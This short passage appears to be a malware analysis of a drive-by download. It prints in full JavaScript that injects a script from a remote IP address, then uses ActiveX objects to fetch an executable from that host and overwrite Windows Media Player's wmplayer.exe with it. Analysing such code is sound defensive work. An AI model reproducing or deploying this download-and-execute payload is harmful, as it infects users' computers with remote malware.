All this does is call more functions:

function getRealShell() {
    myiframe.document.write("<SCRIPT
SRC='http://219.234.95.124/vbox/shellscript.js'><\/SCRIPT>");
}

document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200
HEIGHT=200></IFRAME>");
setTimeout("getRealShell()",100);

The real action is at the "RealShell" address:

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe",0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";

The rest should be fairly obvious from the above code.
